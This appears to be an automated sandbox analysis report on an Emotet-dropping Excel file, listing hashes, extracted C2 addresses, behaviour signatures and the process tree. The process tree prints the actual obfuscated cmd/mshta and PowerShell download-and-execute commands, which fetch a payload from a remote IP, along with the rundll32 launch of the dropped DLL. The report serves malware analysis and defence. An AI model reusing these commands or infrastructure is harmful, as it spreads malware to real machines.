Analysis

  • max time kernel
    120s
  • max time network
    148s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    28-01-2022 01:31

General

  • Target

    Form.xls

  • Size

    47KB

  • MD5

    f3d197c0579236d94decb0af7de08f3d

  • SHA1

    c2c3b665019de5aba0962053c6c811e272d041fe

  • SHA256

    1c12a653dd7eea136fc613f37655963704f5f4d757183cf6463256f116fd4f97

  • SHA512

    c2357597de2e8ef838c86d6c1cbde9d81f5b6c9df788c83874b2d4aca6a829d4caacc3f1b48d0d5f2e093c24bcbb797cc865e2cb25fa98244e4c61cdc47dbfd4

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://91.240.118.168/vvv/ppp/fe.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://91.240.118.168/vvv/ppp/fe.png

Extracted

Family

emotet

Botnet

Epoch4

C2

51.15.4.22:443

173.214.173.220:8080

212.237.5.209:443

192.254.71.210:443

216.158.226.206:443

162.243.175.63:443

212.24.98.99:8080

58.227.42.236:80

45.118.115.99:8080

104.251.214.46:8080

185.157.82.209:8080

46.55.222.11:443

188.40.137.206:8080

81.0.236.90:443

103.75.201.2:443

129.232.188.93:443

195.154.133.20:443

159.8.59.82:8080

79.172.212.216:8080

138.185.72.26:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Form.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3032
    • C:\Windows\SYSTEM32\CMD.EXE
      CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:4228
      • C:\Windows\system32\mshta.exe
        mshta http://91.240.118.168/vvv/ppp/fe.html
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of WriteProcessMemory
        PID:2328
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4292
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1548
            • C:\Windows\SysWow64\rundll32.exe
              C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:2316
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
                7⤵
                • Loads dropped DLL
                • Drops file in System32 directory
                • Suspicious use of WriteProcessMemory
                PID:4260
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xlsvbbbrmq\scuabujgz.ydt",mRyQbfy
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2988
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Xlsvbbbrmq\scuabujgz.ydt",DllRegisterServer
                    9⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3932
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 2328 -s 1652
          4⤵
          • Program crash
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3716

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\QWER.dll
    MD5

    97daeda7d5269be2a567138e6ed876fe

    SHA1

    ce707e51f782320a38f0bb434277edcc4394abbb

    SHA256

    918b972486087dfd6d7ad348771617d9c9a45a7dc9ed5ce48b525e2ceb70da7f

    SHA512

    1c7a1b4d13e874dc6359d4bbcf8c0d5efd6ec8143daebd8b512c3f3b6fc6da2666feba404ac4c73fae91229ae541856c94a52d7e707acc593af44b89eb8901be

  • \ProgramData\QWER.dll
    MD5

    97daeda7d5269be2a567138e6ed876fe

    SHA1

    ce707e51f782320a38f0bb434277edcc4394abbb

    SHA256

    918b972486087dfd6d7ad348771617d9c9a45a7dc9ed5ce48b525e2ceb70da7f

    SHA512

    1c7a1b4d13e874dc6359d4bbcf8c0d5efd6ec8143daebd8b512c3f3b6fc6da2666feba404ac4c73fae91229ae541856c94a52d7e707acc593af44b89eb8901be

  • \ProgramData\QWER.dll
    MD5

    97daeda7d5269be2a567138e6ed876fe

    SHA1

    ce707e51f782320a38f0bb434277edcc4394abbb

    SHA256

    918b972486087dfd6d7ad348771617d9c9a45a7dc9ed5ce48b525e2ceb70da7f

    SHA512

    1c7a1b4d13e874dc6359d4bbcf8c0d5efd6ec8143daebd8b512c3f3b6fc6da2666feba404ac4c73fae91229ae541856c94a52d7e707acc593af44b89eb8901be

  • memory/2316-326-0x0000000004C60000-0x0000000004C85000-memory.dmp
    Filesize

    148KB

  • memory/3032-129-0x00007FFA94C50000-0x00007FFA94C60000-memory.dmp
    Filesize

    64KB

  • memory/3032-128-0x00007FFA94C50000-0x00007FFA94C60000-memory.dmp
    Filesize

    64KB

  • memory/3032-119-0x00007FFA98310000-0x00007FFA98320000-memory.dmp
    Filesize

    64KB

  • memory/3032-388-0x00007FFA98310000-0x00007FFA98320000-memory.dmp
    Filesize

    64KB

  • memory/3032-387-0x00007FFA98310000-0x00007FFA98320000-memory.dmp
    Filesize

    64KB

  • memory/3032-386-0x00007FFA98310000-0x00007FFA98320000-memory.dmp
    Filesize

    64KB

  • memory/3032-385-0x00007FFA98310000-0x00007FFA98320000-memory.dmp
    Filesize

    64KB

  • memory/3032-115-0x00007FFA98310000-0x00007FFA98320000-memory.dmp
    Filesize

    64KB

  • memory/3032-118-0x00007FFA98310000-0x00007FFA98320000-memory.dmp
    Filesize

    64KB

  • memory/3032-117-0x00007FFA98310000-0x00007FFA98320000-memory.dmp
    Filesize

    64KB

  • memory/3032-116-0x00007FFA98310000-0x00007FFA98320000-memory.dmp
    Filesize

    64KB

  • memory/3932-350-0x00000000054B0000-0x00000000054D5000-memory.dmp
    Filesize

    148KB

  • memory/3932-352-0x0000000005590000-0x00000000055B5000-memory.dmp
    Filesize

    148KB

  • memory/3932-373-0x0000000005940000-0x0000000005965000-memory.dmp
    Filesize

    148KB

  • memory/3932-361-0x0000000005850000-0x0000000005875000-memory.dmp
    Filesize

    148KB

  • memory/3932-356-0x0000000005750000-0x0000000005775000-memory.dmp
    Filesize

    148KB

  • memory/3932-354-0x0000000005670000-0x0000000005695000-memory.dmp
    Filesize

    148KB

  • memory/4260-338-0x0000000005710000-0x0000000005735000-memory.dmp
    Filesize

    148KB

  • memory/4260-342-0x00000000057D0000-0x00000000057F5000-memory.dmp
    Filesize

    148KB

  • memory/4260-346-0x0000000005990000-0x00000000059B5000-memory.dmp
    Filesize

    148KB

  • memory/4260-340-0x0000000005770000-0x0000000005795000-memory.dmp
    Filesize

    148KB

  • memory/4260-336-0x00000000055B0000-0x00000000055D5000-memory.dmp
    Filesize

    148KB

  • memory/4260-334-0x00000000054D0000-0x00000000054F5000-memory.dmp
    Filesize

    148KB

  • memory/4260-329-0x0000000003560000-0x0000000003585000-memory.dmp
    Filesize

    148KB

  • memory/4292-314-0x00000224C2FB0000-0x00000224C3026000-memory.dmp
    Filesize

    472KB

  • memory/4292-319-0x00000224C2736000-0x00000224C2738000-memory.dmp
    Filesize

    8KB

  • memory/4292-303-0x00000224C2A60000-0x00000224C2A9C000-memory.dmp
    Filesize

    240KB

  • memory/4292-292-0x00000224C2733000-0x00000224C2735000-memory.dmp
    Filesize

    8KB

  • memory/4292-291-0x00000224C2730000-0x00000224C2732000-memory.dmp
    Filesize

    8KB

  • memory/4292-282-0x00000224C28D0000-0x00000224C28F2000-memory.dmp
    Filesize

    136KB